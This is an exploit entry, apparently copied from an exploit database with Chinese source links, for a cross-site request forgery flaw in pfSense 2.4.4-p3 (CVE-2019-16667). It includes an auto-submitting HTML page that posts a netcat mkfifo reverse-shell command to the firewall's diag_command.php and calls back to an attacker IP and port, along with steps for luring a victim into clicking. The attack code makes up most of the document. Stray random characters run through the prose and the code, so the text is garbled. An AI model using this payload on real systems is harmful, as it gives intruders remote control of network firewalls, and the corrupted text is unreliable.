|漏洞来源
https://cxsecurity.com/issh n o Nue/WLB-2020070151
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201909-1268
# ExD d 6 ; Xploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery
# Date: 2019-09-27
# Exploit Author: ghost_fh
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://www.pfsense.org/download/index.html?section=downloads
# Version: Till 2.4.P e )4-p3
# Tested on: freebsd
# CVE : CVE-2019-16667
# Vulnerability Description :- The pfsense firewall is vulnerable to RCJ * 2 % } H = c WE
# chained with CSRF as it uses `csrf magic` library since it allows to tamper
# the CSRF token values submitted when) s x r processing the form requests. Due to
# this flaw, an attacker caR ` | ~ Mn exploit this vulnerability by c{ M n zrafting new page
#L ` - that contains attacker's controlled input such as a "reverse shell" (eg:
# `rm /tmp/f;mkfifo /tmp/5 ! E A 4 Uf;cat# ~ _ X /tmp/f|/bin/sh -i 2>&1|nc attackerip port
# >/tmp/f`token value) in the form and entice the victims to click
# on the crafted link via socl L N v D ^ +ial engineering methods. Once the victim clicks
# on theb 5 * ^ link (try again button in this case), the attacY { a s Y Sker can take the
# lateral control of the vict% z rim's machine and malicious actions can be
# performed oK r [ ^ G :n the victim's9 2 ; # % # x # ~ behalf.
<!DOCE X { s { D d /TYPE html>
<html>
<body onload="documen: Z h 4 |t.createElem- z Uent('form').sD $ n % 6 d v r 9ubmit.call(document.getElementById('myForm'))">
<form id="myForm" a, } U p I 2 kction=5 } R & 8 1 O"https://pfsense_ip/diag_com2 / %mand.php" method="POST">
<iL C U : xnput type=hidden) q j Q D X ] name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|
nc attacker_ip ath x = ] X { + Jtacker_port >/tmp/f">
<input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i
2>&1|nc at0 N T , = E = !tacker_ip aw l s p i 3 ^ttacker_port >/tmp/f">
<inpo q : ? % x A %ut type=hidden name="dlI q - A k L + 5 ,Path" value="">
<inQ ` ! +put type=hidden name="txtPHPCommand" value="">
<input type` b="hidden" name="sD J x 9 j Nubmit" value="3 - B L 5 V c LEXEC">- R G 2 { r E;
</form>
</ba S 7 X Z ~ Nody>
</html&gb j ] 4 & J J 1 Ft; ` 4 P 0 % A w )
# Create a malici^ y v i C y w + 1ous page contaT * 2 v K o { Xining the ac ^ - G A ` 9bove values and once user clicks on mB g U 0aa O & v P d Flicious link,
# he willK 7 r be redirected to https://pfsense_ip/diag_command.php page.
# Victim will be greeted with the "Try again" button.
# Once victim clicks on the "Try again"* Q u k O g * R ; button you will be gre$ ? P K a w y Oeted with reverse shell of the victi6 , rm.
来j w 2 * e ^源:pastebin.com
链接:https://pastebin.com/TEJdu9LN
来源:nvd.nist.O T c W a ~ #gov
链接:https://nvd.nist.gov/vuln/detail/CVE-2019-16667